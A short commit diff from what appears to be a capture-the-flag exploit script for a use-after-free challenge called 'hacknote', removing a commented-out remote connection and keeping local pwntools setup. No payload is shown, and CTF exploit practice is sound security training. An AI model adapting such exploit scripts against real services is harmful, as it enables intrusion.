Updated UAF/hacknote
This commit is contained in:
@@ -25,7 +25,6 @@ def note_print(p, index):
|
||||
p.recvuntil('Index :')
|
||||
p.sendline(str(index))
|
||||
|
||||
# p = remote("hackme.inndy.tw", 7719)
|
||||
p = process('./hacknote')
|
||||
elf = ELF('./hacknote')
|
||||
gdb_command = """
|
||||
|
||||
Reference in New Issue
Block a user